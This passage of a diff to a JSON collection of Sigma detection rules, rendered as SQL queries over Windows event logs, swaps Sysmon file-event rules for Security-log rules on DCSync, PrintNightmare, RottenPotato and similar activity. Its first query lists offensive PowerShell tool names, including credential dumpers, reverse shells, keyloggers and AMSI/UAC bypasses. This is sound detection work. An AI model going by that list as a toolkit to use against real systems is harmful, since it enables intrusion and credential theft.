TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local User Creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "status": "test", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "author": "Patrick Bareiss", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_user_creation.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Go utilities that use staaldraad awesome NTLM library" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Add or Remove Computer from DC", + "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "status": "experimental", + "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_add_remove_computer.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": 